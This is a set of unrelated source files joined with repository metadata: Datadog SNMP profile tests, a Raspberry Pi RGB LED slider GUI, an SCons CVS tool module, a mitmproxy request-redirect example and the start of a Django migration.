'snmp.aristaEgressQueuePktsDropped',
metric_type=aggregator.MONOTONIC_COUNT,
tags=common_tags + ['interface_index:28', 'queue_index:22'],
count=1,
)
aggregator.assert_metric(
'snmp.aristaIngressQueuePktsDropped',
metric_type=aggregator.MONOTONIC_COUNT,
tags=common_tags + ['interface_index:7', 'queue_index:25'],
count=1,
)
aggregator.assert_metric(
'snmp.aristaIngressQueuePktsDropped',
metric_type=aggregator.MONOTONIC_COUNT,
tags=common_tags + ['interface_index:8', 'queue_index:24'],
count=1,
)
for (sensor_id, sensor_type) in [(1, 11), (7, 8)]:
sensor_tags = ['sensor_id:{}'.format(sensor_id), 'sensor_type:{}'.format(sensor_type)] + common_tags
aggregator.assert_metric('snmp.entPhySensorValue', metric_type=aggregator.GAUGE, tags=sensor_tags, count=1)
aggregator.assert_metric('snmp.entPhySensorOperStatus', metric_type=aggregator.GAUGE, tags=sensor_tags, count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_aruba(aggregator):
run_profile_check('aruba')
common_tags = common.CHECK_TAGS + ['snmp_profile:aruba']
common.assert_common_metrics(aggregator, common_tags)
for fan in [18, 28]:
fan_tags = common_tags + ['fan_index:{}'.format(fan)]
aggregator.assert_metric('snmp.sysExtFanStatus', metric_type=aggregator.GAUGE, tags=fan_tags, count=1)
for psu in [1, 17]:
psu_tags = common_tags + ['powersupply_index:{}'.format(psu)]
aggregator.assert_metric('snmp.sysExtPowerSupplyStatus', metric_type=aggregator.GAUGE, tags=psu_tags, count=1)
for proc in [11, 26]:
proc_tags = common_tags + ['processor_index:{}'.format(proc)]
aggregator.assert_metric('snmp.sysExtProcessorLoad', metric_type=aggregator.GAUGE, tags=proc_tags, count=1)
for mem in [3, 20]:
mem_tags = common_tags + ['memory_index:{}'.format(mem)]
aggregator.assert_metric('snmp.sysExtMemorySize', metric_type=aggregator.GAUGE, tags=mem_tags, count=1)
aggregator.assert_metric('snmp.sysExtMemoryUsed', metric_type=aggregator.GAUGE, tags=mem_tags, count=1)
aggregator.assert_metric('snmp.sysExtMemoryFree', metric_type=aggregator.GAUGE, tags=mem_tags, count=1)
aggregator.assert_metric(
'snmp.wlsxSysExtPacketLossPercent', metric_type=aggregator.GAUGE, tags=common_tags, count=1
)
# OSPF metrics
neighbor_metrics = [
('ospfNbrEvents', aggregator.RATE),
('ospfNbrState', aggregator.GAUGE),
('ospfNbrLsRetransQLen', aggregator.GAUGE),
]
for metric, metric_type in neighbor_metrics:
tags = ['neighbor_ip:192.29.116.26', 'neighbor_id:192.29.66.79'] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=metric_type, tags=tags, count=1)
virtual_neighbor_metrics = [
('ospfVirtNbrState', aggregator.GAUGE),
('ospfVirtNbrEvents', aggregator.RATE),
('ospfVirtNbrLsRetransQLen', aggregator.GAUGE),
]
for metric, metric_type in virtual_neighbor_metrics:
for ip, nbr in [('74.210.82.1', '194.154.66.112'), ('122.226.86.1', '184.201.101.140')]:
tags = ['neighbor_ip:{}'.format(ip), 'neighbor_id:{}'.format(nbr)] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=metric_type, tags=tags, count=1)
lls_metrics = ['ospfIfRetransInterval', 'ospfIfState', 'ospfIfLsaCount']
for metric in lls_metrics:
for ip, nbr in [('58.115.169.188', '192.29.66.79'), ('18.2.8.29', '118.246.193.247')]:
tags = ['ospf_ip_addr:{}'.format(ip), 'neighbor_id:{}'.format(nbr)] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
virtual_lls_metrics = ['ospfVirtIfRetransInterval', 'ospfVirtIfState', 'ospfVirtIfLsaCount']
for metric in virtual_lls_metrics:
for nbr in ['194.154.66.112', '184.201.101.140']:
tags = ['neighbor_id:{}'.format(nbr)] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_chatsworth(aggregator):
run_profile_check('chatsworth')
# Legacy global tags are applied to all metrics
legacy_global_tags = [
'legacy_pdu_macaddress:00:0E:D3:AA:CC:EE',
'legacy_pdu_model:P10-1234-ABC',
'legacy_pdu_name:legacy-name1',
'legacy_pdu_version:1.2.3',
]
common_tags = common.CHECK_TAGS + legacy_global_tags + ['snmp_profile:chatsworth_pdu']
common.assert_common_metrics(aggregator, common_tags)
# Legacy metrics
legacy_pdu_tags = common_tags
legacy_pdu_gauge_metrics = [
'snmp.pduRole',
'snmp.outOfService',
]
legacy_pdu_monotonic_count_metrics = []
for line in range(1, 4):
legacy_pdu_gauge_metrics.append('snmp.line{}curr'.format(line))
for branch in range(1, 3):
legacy_pdu_gauge_metrics.append('snmp.temperatureProbe{}'.format(branch))
legacy_pdu_gauge_metrics.append('snmp.humidityProbe{}'.format(branch))
for xyz in ['xy', 'yz', 'zx']:
legacy_pdu_monotonic_count_metrics.append('snmp.energy{}{}s'.format(xyz, branch))
legacy_pdu_gauge_metrics.append('snmp.voltage{}{}'.format(xyz, branch))
legacy_pdu_gauge_metrics.append('snmp.power{}{}'.format(xyz, branch))
legacy_pdu_gauge_metrics.append('snmp.powerFact{}{}'.format(xyz, branch))
legacy_pdu_gauge_metrics.append('snmp.current{}{}'.format(xyz, branch))
for branch in range(1, 25):
legacy_pdu_monotonic_count_metrics.append('snmp.receptacleEnergyoutlet{}s'.format(branch))
legacy_pdu_gauge_metrics.append('snmp.outlet{}Current'.format(branch))
for metric in legacy_pdu_gauge_metrics:
aggregator.assert_metric(metric, metric_type=aggregator.GAUGE, tags=legacy_pdu_tags, count=1)
for metric in legacy_pdu_monotonic_count_metrics:
aggregator.assert_metric(metric, metric_type=aggregator.MONOTONIC_COUNT, tags=legacy_pdu_tags, count=1)
# New metrics
pdu_tags = common_tags + [
'pdu_cabinetid:cab1',
'pdu_ipaddress:42.2.210.224',
'pdu_macaddress:0x00249b3503f6',
'pdu_model:model1',
'pdu_name:name1',
'pdu_version:v1.1',
]
aggregator.assert_metric('snmp.cpiPduNumberBranches', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1)
aggregator.assert_metric('snmp.cpiPduNumberOutlets', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1)
aggregator.assert_metric('snmp.cpiPduOutOfService', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1)
aggregator.assert_metric('snmp.cpiPduUpgrade', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1)
aggregator.assert_metric('snmp.cpiPduChainRole', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1)
aggregator.assert_metric('snmp.cpiPduTotalPower', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1)
for lock in [1, 2]:
lock_tags = common_tags + ['lock_id:{}'.format(lock)]
aggregator.assert_metric('snmp.cpiPduEasStatus', metric_type=aggregator.GAUGE, tags=lock_tags, count=1)
aggregator.assert_metric('snmp.cpiPduDoorStatus', metric_type=aggregator.GAUGE, tags=lock_tags, count=1)
aggregator.assert_metric('snmp.cpiPduLockStatus', metric_type=aggregator.GAUGE, tags=lock_tags, count=1)
for (sensor_name, sensor_index) in [('sensor1', 4), ('sensor2', 6)]:
sensor_tags = common_tags + [
'sensor_index:{}'.format(sensor_index),
'sensor_name:{}'.format(sensor_name),
'sensor_type:1',
]
aggregator.assert_metric('snmp.cpiPduSensorValue', metric_type=aggregator.GAUGE, tags=sensor_tags, count=1)
for line in [6, 18]:
line_tags = common_tags + ['line_id:{}'.format(line)]
aggregator.assert_metric('snmp.cpiPduLineCurrent', metric_type=aggregator.GAUGE, tags=line_tags, count=1)
for branch in [1, 17]:
branch_tags = common_tags + ['branch_id:{}'.format(branch)]
aggregator.assert_metric('snmp.cpiPduBranchCurrent', metric_type=aggregator.GAUGE, tags=branch_tags, count=1)
aggregator.assert_metric('snmp.cpiPduBranchMaxCurrent', metric_type=aggregator.GAUGE, tags=branch_tags, count=1)
aggregator.assert_metric('snmp.cpiPduBranchVoltage', metric_type=aggregator.GAUGE, tags=branch_tags, count=1)
aggregator.assert_metric('snmp.cpiPduBranchPower', metric_type=aggregator.GAUGE, tags=branch_tags, count=1)
aggregator.assert_metric(
'snmp.cpiPduBranchPowerFactor', metric_type=aggregator.GAUGE, tags=branch_tags, count=1
)
aggregator.assert_metric('snmp.cpiPduBranchStatus', metric_type=aggregator.GAUGE, tags=branch_tags, count=1)
aggregator.assert_metric(
'snmp.cpiPduBranchEnergy', metric_type=aggregator.MONOTONIC_COUNT, tags=branch_tags, count=1
)
for (outlet_id, outlet_branch, outlet_name) in [(7, 29, 'outlet1'), (16, 23, 'outlet2')]:
outlet_tags = common_tags + [
'outlet_id:{}'.format(outlet_id),
'outlet_branchid:{}'.format(outlet_branch),
'outlet_name:{}'.format(outlet_name),
]
aggregator.assert_metric('snmp.cpiPduOutletCurrent', metric_type=aggregator.GAUGE, tags=outlet_tags, count=1)
aggregator.assert_metric('snmp.cpiPduOutletVoltage', metric_type=aggregator.GAUGE, tags=outlet_tags, count=1)
aggregator.assert_metric('snmp.cpiPduOutletPower', metric_type=aggregator.GAUGE, tags=outlet_tags, count=1)
aggregator.assert_metric('snmp.cpiPduOutletStatus', metric_type=aggregator.GAUGE, tags=outlet_tags, count=1)
aggregator.assert_metric(
'snmp.cpiPduOutletEnergy', metric_type=aggregator.MONOTONIC_COUNT, tags=outlet_tags, count=1
)
aggregator.assert_all_metrics_covered()
aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_metric_type=False)
@pytest.mark.usefixtures("dd_environment")
def test_isilon(aggregator):
run_profile_check('isilon')
common_tags = common.CHECK_TAGS + [
'snmp_profile:isilon',
'cluster_name:testcluster1',
'node_name:node1',
'node_type:1',
]
cluster_rates = [
'clusterIfsInBytes',
'clusterIfsOutBytes',
]
node_rates = [
'nodeIfsOutBytes',
'nodeIfsInBytes',
]
protocol_metrics = [
'protocolOpsPerSecond',
'latencyMin',
'latencyMax',
'latencyAverage',
]
quota_metrics = ['quotaHardThreshold', 'quotaSoftThreshold', 'quotaUsage', 'quotaAdvisoryThreshold']
quota_ids_types = [
(422978632, 1),
(153533730, 5),
(3299369987, 4),
(2149993012, 3),
(1424325378, 1),
(4245321451, 0),
(2328145711, 1),
(1198032230, 4),
(1232918362, 1),
(1383990869, 1),
]
common.assert_common_metrics(aggregator, common_tags)
for metric in quota_metrics:
for qid, qtype in quota_ids_types:
tags = ['quota_id:{}'.format(qid), 'quota_type:{}'.format(qtype)] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1)
for metric in protocol_metrics:
for num in range(1, 3):
tags = ['protocol_name:testprotocol{}'.format(num)] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_metric('snmp.clusterHealth', metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in cluster_rates:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=common_tags, count=1)
aggregator.assert_metric('snmp.nodeHealth', metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in node_rates:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=common_tags, count=1)
for fan in [4, 6, 10, 11, 14, 21, 22, 23, 25, 30]:
tags = ['fan_name:testfan', 'fan_number:{}'.format(fan)] + common_tags
aggregator.assert_metric('snmp.fanSpeed', metric_type=aggregator.GAUGE, tags=tags, count=1)
for status, bay in [('SMARTFAIL', 1), ('HEALTHY', 2), ('DEAD', 3)]:
        tags = common_tags + ['disk_status:{}'.format(status), 'disk_bay:{}'.format(bay)]
aggregator.assert_metric('snmp.diskSizeBytes', metric_type=aggregator.RATE, tags=tags)
aggregator.assert_metric('snmp.ifsUsedBytes', metric_type=aggregator.RATE, tags=common_tags, count=1)
aggregator.assert_metric('snmp.ifsTotalBytes', metric_type=aggregator.RATE, tags=common_tags, count=1)
@pytest.mark.usefixtures("dd_environment")
def test_apc_ups(aggregator):
run_profile_check('apc_ups')
profile_tags = [
'snmp_profile:apc_ups',
'model:APC Smart-UPS 600',
'firmware_version:2.0.3-test',
'serial_num:test_serial',
'ups_name:testIdentName',
]
tags = common.CHECK_TAGS + profile_tags
metrics = [
'upsAdvBatteryNumOfBadBattPacks',
'upsAdvBatteryReplaceIndicator',
'upsAdvBatteryRunTimeRemaining',
'upsAdvBatteryTemperature',
'upsAdvBatteryCapacity',
'upsHighPrecInputFrequency',
'upsHighPrecInputLineVoltage',
'upsHighPrecOutputCurrent',
'upsAdvInputLineFailCause',
'upsAdvOutputLoad',
'upsBasicBatteryTimeOnBattery',
'upsAdvTestDiagnosticsResults',
]
common.assert_common_metrics(aggregator, tags)
for metric in metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_metric(
'snmp.upsOutletGroupStatusGroupState',
metric_type=aggregator.GAUGE,
tags=['outlet_group_name:test_outlet'] + tags,
)
aggregator.assert_metric(
'snmp.upsBasicStateOutputState.AVRTrimActive', 1, metric_type=aggregator.GAUGE, tags=tags, count=1
)
aggregator.assert_metric(
'snmp.upsBasicStateOutputState.BatteriesDischarged', 1, metric_type=aggregator.GAUGE, tags=tags, count=1
)
aggregator.assert_metric(
'snmp.upsBasicStateOutputState.LowBatteryOnBattery', 1, metric_type=aggregator.GAUGE, tags=tags, count=1
)
aggregator.assert_metric(
'snmp.upsBasicStateOutputState.NoBatteriesAttached', 1, metric_type=aggregator.GAUGE, tags=tags, count=1
)
aggregator.assert_metric(
'snmp.upsBasicStateOutputState.OnLine', 0, metric_type=aggregator.GAUGE, tags=tags, count=1
)
aggregator.assert_metric(
'snmp.upsBasicStateOutputState.ReplaceBattery', 1, metric_type=aggregator.GAUGE, tags=tags, count=1
)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_fortinet_fortigate(aggregator):
run_profile_check('fortinet-fortigate')
common_tags = common.CHECK_TAGS + ['snmp_profile:fortinet-fortigate']
common_gauge_metrics = [
'fgSysCpuUsage',
'fgSysMemUsage',
'fgSysMemCapacity',
'fgSysLowMemUsage',
'fgSysLowMemCapacity',
'fgSysDiskUsage',
'fgSysDiskCapacity',
'fgSysSesCount',
'fgSysSesRate1',
'fgSysSes6Count',
'fgSysSes6Rate1',
'fgApHTTPConnections',
'fgApHTTPMaxConnections',
'fgVdNumber',
'fgVdMaxVdoms',
]
processor_gauge_metrics = [
'fgProcessorUsage',
'fgProcessorSysUsage',
]
processor_count_metrics = [
'fgProcessorPktRxCount',
'fgProcessorPktTxCount',
'fgProcessorPktDroppedCount',
]
processor_tags = common_tags + ['processor_index:12']
vd_metrics = [
'fgVdEntOpMode',
'fgVdEntHaState',
'fgVdEntCpuUsage',
'fgVdEntMemUsage',
'fgVdEntSesCount',
'fgVdEntSesRate',
]
vd_tags = common_tags + ['virtualdomain_index:4', 'virtualdomain_name:their oxen quaintly']
common.assert_common_metrics(aggregator, common_tags)
for metric in common_gauge_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in processor_gauge_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=processor_tags, count=1)
for metric in processor_count_metrics:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=processor_tags, count=1
)
aggregator.assert_metric(
'snmp.{}.rate'.format(metric), metric_type=aggregator.RATE, tags=processor_tags, count=1
)
for metric in vd_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=vd_tags, count=1)
# Interface
aggregator.assert_metric('snmp.fgIntfEntVdom', metric_type=aggregator.GAUGE, count=1)
# Firewall
firewall_tags = common_tags + ['policy_index:22']
for metric in ['fgFwPolPktCount', 'fgFwPolByteCount']:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=firewall_tags, count=1
)
aggregator.assert_metric(
'snmp.{}.rate'.format(metric), metric_type=aggregator.RATE, tags=firewall_tags, count=1
)
# Firewall 6
firewall6_tags = common_tags + ['policy6_index:29']
for metric in ['fgFwPol6PktCount', 'fgFwPol6ByteCount']:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=firewall6_tags, count=1
)
aggregator.assert_metric(
'snmp.{}.rate'.format(metric), metric_type=aggregator.RATE, tags=firewall6_tags, count=1
)
aggregator.assert_all_metrics_covered()
aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_metric_type=False)
@pytest.mark.usefixtures("dd_environment")
def test_netapp(aggregator):
run_profile_check('netapp')
profile_tags = [
'snmp_profile:netapp',
'snmp_host:example-datacenter.company',
]
common_tags = common.CHECK_TAGS + profile_tags
common.assert_common_metrics(aggregator, common_tags)
gauges = [
'cfInterconnectStatus',
'miscCacheAge',
'ncHttpActiveCliConns',
]
counts = [
'extcache64Hits',
]
for metric in gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in counts:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
snapvault_counts = [
'svTotalFailures',
]
snapvaults = [('5', '/vol/dir1', '5'), ('6', '/vol/dir3', '2'), ('18', '/vol/dir9', '4')]
for metric in snapvault_counts:
for index, destination, state in snapvaults:
tags = [
'index:{}'.format(index),
'destination:{}'.format(destination),
'state:{}'.format(state),
] + common_tags
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
snapmirrors = [('6', '1'), ('9', '5'), ('29', '1')]
snapmirror_gauges = [
'snapmirrorLag',
]
snapmirror_counts = [
'snapmirrorTotalFailures',
]
for index, state in snapmirrors:
tags = ['index:{}'.format(index), 'state:{}'.format(state)] + common_tags
for metric in snapmirror_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for metric in snapmirror_counts:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
filesystem_gauges = [
'dfHighTotalKBytes',
'dfHighAvailKBytes',
'dfInodesUsed',
'dfInodesFree',
]
filesystem_indexes = [
'1022',
'1023',
'1024',
'1025',
'1026',
'1027',
'1028',
'1029',
'1032',
'1033',
]
filesystems = ['/vol/dir{}'.format(n) for n in range(1, len(filesystem_indexes) + 1)]
for metric in filesystem_gauges:
for index, filesystem in zip(filesystem_indexes, filesystems):
tags = ['index:{}'.format(index), 'filesystem:{}'.format(filesystem)] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
if_counts = [
'ifHighInOctets',
]
if_rates = [
'ifHighInOctets.rate',
]
interfaces = [
# Interface descriptions will be normalized in the backend, but we receive the raw DisplayString values here.
('6', 'netgear ifX300 v1'),
('7', 'junyper proto12 12.3'),
('23', 'malabar yz42 10.2020'),
]
for index, descr in interfaces:
tags = ['index:{}'.format(index), 'interface:{}'.format(descr)] + common_tags
for metric in if_counts:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in if_rates:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', metric_type=aggregator.GAUGE, tags=common_tags, count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_cisco_catalyst(aggregator):
run_profile_check('cisco-catalyst')
common_tags = common.CHECK_TAGS + ['snmp_host:catalyst-6000.example', 'snmp_profile:cisco-catalyst']
sensors = [5, 9]
for sensor in sensors:
tags = ['sensor_id:{}'.format(sensor), 'sensor_type:10'] + common_tags
aggregator.assert_metric('snmp.entSensorValue', metric_type=aggregator.GAUGE, tags=tags, count=1)
interfaces = ["Gi1/0/{}".format(i) for i in [6, 10, 12, 18, 22, 25, 27]]
for interface in interfaces:
tags = ['interface:{}'.format(interface)] + common_tags
for metric in CIE_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
frus = [1001, 1010, 2001, 2010]
for fru in frus:
tags = ['fru:{}'.format(fru)] + common_tags
for metric in FRU_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
aggregator.assert_metric('snmp.devices_monitored', count=1)
aggregator.assert_all_metrics_covered()
| 41.462159
| 120
| 0.672881
|
76a696faa434f1a385919c7aa42b0c62bf8e9a58
| 2,644
|
py
|
Python
|
scons-local-1.1.0/SCons/Tool/CVS.py
|
frew/simpleproto
|
393a7a059802152c888130c0a117fcc62d4fc8ab
|
[
"BSD-2-Clause",
"MIT"
] | null | null | null |
scons-local-1.1.0/SCons/Tool/CVS.py
|
frew/simpleproto
|
393a7a059802152c888130c0a117fcc62d4fc8ab
|
[
"BSD-2-Clause",
"MIT"
] | null | null | null |
scons-local-1.1.0/SCons/Tool/CVS.py
|
frew/simpleproto
|
393a7a059802152c888130c0a117fcc62d4fc8ab
|
[
"BSD-2-Clause",
"MIT"
] | null | null | null |
"""SCons.Tool.CVS.py
Tool-specific initialization for CVS.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/CVS.py 3603 2008/10/10 05:46:45 scons"
import SCons.Action
import SCons.Builder
import SCons.Util
def generate(env):
"""Add a Builder factory function and construction variables for
CVS to an Environment."""
    def CVSFactory(repos, module='', env=env):
        """Return a Builder that checks sources out of the given CVS repository/module."""
# fail if repos is not an absolute path name?
if module != '':
# Don't use os.path.join() because the name we fetch might
# be across a network and must use POSIX slashes as separators.
module = module + '/'
env['CVSCOM'] = '$CVS $CVSFLAGS co $CVSCOFLAGS -d ${TARGET.dir} $CVSMODULE${TARGET.posix}'
act = SCons.Action.Action('$CVSCOM', '$CVSCOMSTR')
return SCons.Builder.Builder(action = act,
env = env,
CVSREPOSITORY = repos,
CVSMODULE = module)
#setattr(env, 'CVS', CVSFactory)
env.CVS = CVSFactory
env['CVS'] = 'cvs'
env['CVSFLAGS'] = SCons.Util.CLVar('-d $CVSREPOSITORY')
env['CVSCOFLAGS'] = SCons.Util.CLVar('')
env['CVSCOM'] = '$CVS $CVSFLAGS co $CVSCOFLAGS ${TARGET.posix}'
def exists(env):
return env.Detect('cvs')
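# Illustrative usage (a sketch, not part of the original tool module; the exact
# incantation may vary between SCons releases):
#
#     env = Environment(tools=['CVS'])
#     env.SourceCode('.', env.CVS('/usr/local/CVSROOT', 'my_module'))
#
# This tells SCons to fetch missing source files from the 'my_module' module of
# the given repository using the check-out command configured in generate().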
| 38.882353
| 103
| 0.674357
|
f193a4793b5413eef85ecfb9fcbc48939954de51
| 2,449
|
py
|
Python
|
RGB_LED_Control.py
|
Linja82/Raspberry-Pi-RGB-LED-Control-w-GUI
|
295c58f9a126bf72b03e2d3d59c0747daff6e912
|
[
"MIT"
] | null | null | null |
RGB_LED_Control.py
|
Linja82/Raspberry-Pi-RGB-LED-Control-w-GUI
|
295c58f9a126bf72b03e2d3d59c0747daff6e912
|
[
"MIT"
] | null | null | null |
RGB_LED_Control.py
|
Linja82/Raspberry-Pi-RGB-LED-Control-w-GUI
|
295c58f9a126bf72b03e2d3d59c0747daff6e912
|
[
"MIT"
] | null | null | null |
from tkinter import *
import RPi.GPIO as GPIO
import time
##### NOTES #####
# The common anode pin connects to the 3.3V rail
# Duty cycle values need to be inverted because the LED is common anode
# Higher duty cycle reduces the voltage difference between the GPIO pin and the 3.3V rail
# Resistors:
# Red: 200 Ω
# Green: 100 Ω
# Blue: 100 Ω
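# Worked example of the inversion performed in setColour() below (illustration only):
#   r_in = 255  ->  duty = round(((255 - 255) / 255) * 100) =   0  -> pin held LOW  -> full brightness
#   r_in = 128  ->  duty = round(((255 - 128) / 255) * 100) =  50  -> roughly half brightness
#   r_in =   0  ->  duty = round(((255 -   0) / 255) * 100) = 100  -> pin held HIGH -> LED off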
colour_pins = [11, 15, 13] # Red, Green, Blue
def setup(): # Initiates the GPIO pins and pwm
global pwmR, pwmG, pwmB
GPIO.setmode(GPIO.BOARD)
for i in colour_pins: # Sets pin mode and state for all 3 LED pins
GPIO.setup(i, GPIO.OUT)
GPIO.output(i, GPIO.LOW)
pwmR = GPIO.PWM(colour_pins[0], 8000)
pwmG = GPIO.PWM(colour_pins[1], 8000)
pwmB = GPIO.PWM(colour_pins[2], 8000)
pwmR.start(0)
pwmG.start(0)
pwmB.start(0)
def setColour(r_in, g_in, b_in): # 0 ~ 255 values
r = round(((255 - r_in) / 255) * 100)
g = round(((255 - g_in) / 255) * 100)
b = round(((255 - b_in) / 255) * 100)
pwmR.ChangeDutyCycle(r)
print("Red " + str(r) + " / " + str(r_in))
pwmG.ChangeDutyCycle(g)
print("Green " + str(g) + " / " + str(g_in))
pwmB.ChangeDutyCycle(b)
print("Blue " + str(b) + " / " + str(b_in))
print("\n")
def shutdown():
pwmR.stop()
pwmG.stop()
pwmB.stop()
GPIO.cleanup()
window.destroy()
exit()
# Program start
setup()
window = Tk()
window.title("RGB LED Control")
window.geometry("280x360")
# Create the widgets
red_label = Label(window, text="Red")
red_slider = Scale(window, from_=255, to=0, length=300, resolution=1, orient=VERTICAL)
green_label = Label(window, text="Green")
green_slider = Scale(window, from_=255, to=0, length=300, resolution=1, orient=VERTICAL)
blue_label = Label(window, text="Blue")
blue_slider = Scale(window, from_=255, to=0, length=300, resolution=1, orient=VERTICAL)
# Place the widgets on a grid
red_label.grid(row=0, column=0, padx=(60, 0))
red_slider.grid(row=1, column=0, padx=(30, 0))
green_label.grid(row=0, column=1, padx=(25, 0))
green_slider.grid(row=1, column=1)
blue_label.grid(row=0, column=2, padx=(26, 0))
blue_slider.grid(row=1, column=2)
leave = Button(window, text="Exit", command=shutdown)  # keep the widget reference; grid() returns None
leave.grid(row=2, column=1, padx=(30, 0))
LOOP_ACTIVE = True
while LOOP_ACTIVE:
window.update()
# Display colour here
setColour(red_slider.get(), green_slider.get(), blue_slider.get())
time.sleep(0.5)
| 24.989796
| 91
| 0.648428
|
3a3ad300f5b6f7114ca10cd9739e425d90ef1196
| 659
|
py
|
Python
|
examples/redirect_requests.py
|
sebdraven/mitmproxy
|
6a31d3271219dffc9786f08e387ad5dc812fe86c
|
[
"MIT"
] | 2
|
2015-05-10T15:07:44.000Z
|
2016-01-04T21:13:01.000Z
|
examples/redirect_requests.py
|
kmanna/mitmproxy
|
f850bdd8483907b297804ab0f8d07ff1cb456ff5
|
[
"MIT"
] | null | null | null |
examples/redirect_requests.py
|
kmanna/mitmproxy
|
f850bdd8483907b297804ab0f8d07ff1cb456ff5
|
[
"MIT"
] | null | null | null |
from libmproxy.flow import Response
from netlib.odict import ODictCaseless
"""
This example shows two ways to redirect flows to other destinations.
"""
def request(context, flow):
    # First way: answer the client directly with a canned response.
    if flow.request.host.endswith("example.com"):
resp = Response(flow.request,
[1,1],
200, "OK",
ODictCaseless([["Content-Type","text/html"]]),
"helloworld",
None)
flow.request.reply(resp)
    # Second way: rewrite the request so it is forwarded to another host.
    if flow.request.host.endswith("example.org"):
flow.request.host = "mitmproxy.org"
flow.request.headers["Host"] = ["mitmproxy.org"]
| 32.95
| 70
| 0.561457
|
b2cdb79eaa0e2fb2bd5cf8b32803b2b2e0268f83
| 1,275
|
py
|
Python
|
authors/apps/articles/migrations/0003_auto_20180925_1142.py
|
andela/ah-leagueOfLegends
|
ebe3a4621a5baf36a9345d4b126ba73dc37acd1f
|
[
"BSD-3-Clause"
] | null | null | null |
authors/apps/articles/migrations/0003_auto_20180925_1142.py
|
andela/ah-leagueOfLegends
|
ebe3a4621a5baf36a9345d4b126ba73dc37acd1f
|
[
"BSD-3-Clause"
] | 43
|
2018-08-27T16:53:58.000Z
|
2022-03-11T23:28:24.000Z
|
authors/apps/articles/migrations/0003_auto_20180925_1142.py
|
andela/ah-leagueOfLegends
|
ebe3a4621a5baf36a9345d4b126ba73dc37acd1f
|
[
"BSD-3-Clause"
] | 2
|
2018-10-30T10:30:35.000Z
|
2018-11-12T07:48:02.000Z
|
# Generated by Django 2.1 on 2018-09-25 11:42
from django.conf import settings
